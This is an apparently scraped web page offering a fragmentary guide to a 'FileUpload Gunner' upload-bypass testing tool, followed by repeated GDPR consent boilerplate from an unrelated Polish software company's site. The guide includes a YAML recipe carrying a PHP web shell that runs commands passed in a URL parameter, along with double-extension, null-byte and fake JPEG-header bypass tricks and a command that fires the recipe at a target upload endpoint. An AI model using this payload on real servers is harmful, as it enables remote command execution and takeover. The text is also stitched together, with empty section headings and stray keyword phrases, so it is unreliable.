Fileupload Gunner Project (2025)

Mastering the FileUpload Gunner Project: A Comprehensive Guide to Robust File Handling

Build the payload database

python scripts/build_payloads.py --update

Example: Custom Payload Recipe (bypass_nginx.yaml)

name: "Nginx FastCGI Bypass"
type: fileupload
vectors:
  - filename: "shell.php"
    content_type: "image/jpeg"
    double_extension: true
    magic_bytes: "\xFF\xD8\xFF\xE0"  # JPEG header
    body: "<?php system($_GET['cmd']); ?>"
  - filename: "test.asp;.jpg"
    content_type: "text/plain"
    inject_null_byte: true

Run this custom recipe:

./gunner.py --recipe bypass_nginx.yaml --target http://target.com/upload

Architecture Overview

6. Installation & Usage

Use Cases:

Why "Gunner"? The Project’s Core Mission

Traditional upload testing tools send a single file and check the response. The FileUpload Gunner Project, however, operates like a military "gunner" – suppressive, continuous, and adaptive. It doesn't just test if a .php file can be uploaded; it tests if shell.php.jpg, shell.php%00.jpg, or shell.PhP3 can bypass the validator. fileupload gunner project

The project’s mission is threefold:

  1. For Offensive Security: Identify zero-day bypasses in web application firewalls (WAFs).
  2. For Defensive Security: Validate that your sanitization logic (e.g., fileinfo magic bytes, content-disposition parsing) actually works.
  3. For Quality Assurance: Ensure your server can handle concurrent large uploads without crashing (load testing).

Find us

Services

Backoffice admin panel
Revit plugin
Online library – BIM portal

About us

Blog
Our clients
Recruitment
About us
Contact
Our events

Other

PricingHow to start?Case studies
I hereby consent to the processing of my personal data by the Personal Data Administrator (hereinafter: “ADO”) — Sagiton Sp. z o.o. ul. Legnicka 59/B26, 54-203 Wrocław, in the scope of: name, email address or telephone, for the purposes of selling products and services of Sagiton Sp. z o.o. and for the purpose of sending me feedback and contacting me by Sagiton Sp. z o.o.

At the same time, I acknowledge that: at any time I can request the deletion of my personal data from ADO Sagiton Sp. z o.o., by sending to the e-mail address gdpr@sagiton.pl. or in writing, to the address Sagiton Sp. z o.o., ul. Legnicka 59/B26, 54-203 Wrocław, a statement containing the relevant request, which will result in the deletion of my personal data from the ADO Sagiton database Sp. z o.o.; I have the right to access the content of my data; providing my data is voluntary, although refusal to provide them is tantamount to not receiving them information regarding the sale of products and services of Sagiton Sp. z o.o., as well as with non-receipt of feedback and contact with me by Sagiton Sp. z o.o.
Close
In accordance with Article 13 (1) of the General Data Protection Regulation of 27 April 2016 (GDPR), we inform you that the administrator of your personal data is Sagiton Sp. z o.o. with its registered office at ul. Legnicka 59/B26, 54-203 Wrocław, e-mail: gdpr@sagiton.pl

Your personal data will be processed in the scope of your name, email address and/or telephone number in order to respond to your enquiry/request for contact and provide feedback — on the basis of Art. 6 (1) lit. a GDPR, i.e. consent to the processing of personal data.

The data controller informs that your personal data will not be made available to third parties.

Your data will not be transferred outside the European Economic Area or to international organisations.

Your personal data will be processed until you withdraw your consent to the processing of data and also in the event that the purposes of processing these data cease.

You have the right to access, rectify, delete, restrict processing, transfer and object to your personal data.

If you give your consent, you have the right to withdraw your consent at any time. The exercise of the right to withdraw consent does not affect the processing that took place until the withdrawal of consent.

You have the right to lodge a complaint with the supervisory authority, i.e. the President of the Office for Personal Data Protection, ul. Stawki 2, 00-193 Warszawa.

Providing your personal data is a prerequisite for establishing contact with you by Sagiton Sp. z o.o. with its registered office at ul. Legnicka 59/B26, 54-203 Wrocław. If you do not provide personal data, Sagiton Sp. z o.o., will not be able to contact you.

Data Controller Sagiton Sp. z o.o. informs that it will not use your personal data for automated decision-making, which is based solely on automated processing, including profiling, and has legal effects on you or similarly significantly affects you.
Close
I hereby consent to the processing of my personal data by the Personal Data Administrator (hereinafter: “ADO”) — Sagiton Sp. z o.o. ul. Legnicka 59/B26, 54-203 Wrocław, in the scope of: name, email address or telephone, for marketing purposes, by Sagiton Sp. z o.o.

At the same time, I acknowledge that: at any time I can request the deletion of my personal data from ADO Sagiton Sp. z o.o., by sending to the e-mail address gdpr@sagiton.pl or in writing, to the address Sagiton Sp. z o.o., ul. Legnicka 59/B26, 54-203 Wrocław, a statement containing the relevant request, which will result in the deletion of my personal data from the ADO Sagiton Sp. z o.o.; I have the right to access the content of my data; providing my data is voluntary, although refusal to provide them is tantamount to not receiving them commercial information from Sagiton Sp. z o.o.
Close

Sagiton Sp. z o.o. © 2025

Privacy Policy

I hereby consent to the processing of my personal data by the Personal Data Administrator (hereinafter: “ADO”) — Sagiton Sp. z o.o. ul. Legnicka 59/B26, 54-203 Wrocław, in the scope of: name, email address or telephone, for the purposes of selling products and services of Sagiton Sp. z o.o. and for the purpose of sending me feedback and contacting me by Sagiton Sp. z o.o.

At the same time, I acknowledge that: at any time I can request the deletion of my personal data from ADO Sagiton Sp. z o.o., by sending to the e-mail address gdpr@sagiton.pl. or in writing, to the address Sagiton Sp. z o.o., ul. Legnicka 59/B26, 54-203 Wrocław, a statement containing the relevant request, which will result in the deletion of my personal data from the ADO Sagiton database Sp. z o.o.; I have the right to access the content of my data; providing my data is voluntary, although refusal to provide them is tantamount to not receiving them information regarding the sale of products and services of Sagiton Sp. z o.o., as well as with non-receipt of feedback and contact with me by Sagiton Sp. z o.o.
Close
In accordance with Article 13 (1) of the General Data Protection Regulation of 27 April 2016 (GDPR), we inform you that the administrator of your personal data is Sagiton Sp. z o.o. with its registered office at ul. Legnicka 59/B26, 54-203 Wrocław, e-mail: gdpr@sagiton.pl

Your personal data will be processed in the scope of your name, email address and/or telephone number in order to respond to your enquiry/request for contact and provide feedback — on the basis of Art. 6 (1) lit. a GDPR, i.e. consent to the processing of personal data.

The data controller informs that your personal data will not be made available to third parties.

Your data will not be transferred outside the European Economic Area or to international organisations.

Your personal data will be processed until you withdraw your consent to the processing of data and also in the event that the purposes of processing these data cease.

You have the right to access, rectify, delete, restrict processing, transfer and object to your personal data.

If you give your consent, you have the right to withdraw your consent at any time. The exercise of the right to withdraw consent does not affect the processing that took place until the withdrawal of consent.

You have the right to lodge a complaint with the supervisory authority, i.e. the President of the Office for Personal Data Protection, ul. Stawki 2, 00-193 Warszawa.

Providing your personal data is a prerequisite for establishing contact with you by Sagiton Sp. z o.o. with its registered office at ul. Legnicka 59/B26, 54-203 Wrocław. If you do not provide personal data, Sagiton Sp. z o.o., will not be able to contact you.

Data Controller Sagiton Sp. z o.o. informs that it will not use your personal data for automated decision-making, which is based solely on automated processing, including profiling, and has legal effects on you or similarly significantly affects you.
Close
I hereby consent to the processing of my personal data by the Personal Data Administrator (hereinafter: “ADO”) — Sagiton Sp. z o.o. ul. Legnicka 59/B26, 54-203 Wrocław, in the scope of: name, email address or telephone, for marketing purposes, by Sagiton Sp. z o.o.

At the same time, I acknowledge that: at any time I can request the deletion of my personal data from ADO Sagiton Sp. z o.o., by sending to the e-mail address gdpr@sagiton.pl or in writing, to the address Sagiton Sp. z o.o., ul. Legnicka 59/B26, 54-203 Wrocław, a statement containing the relevant request, which will result in the deletion of my personal data from the ADO Sagiton Sp. z o.o.; I have the right to access the content of my data; providing my data is voluntary, although refusal to provide them is tantamount to not receiving them commercial information from Sagiton Sp. z o.o.
Close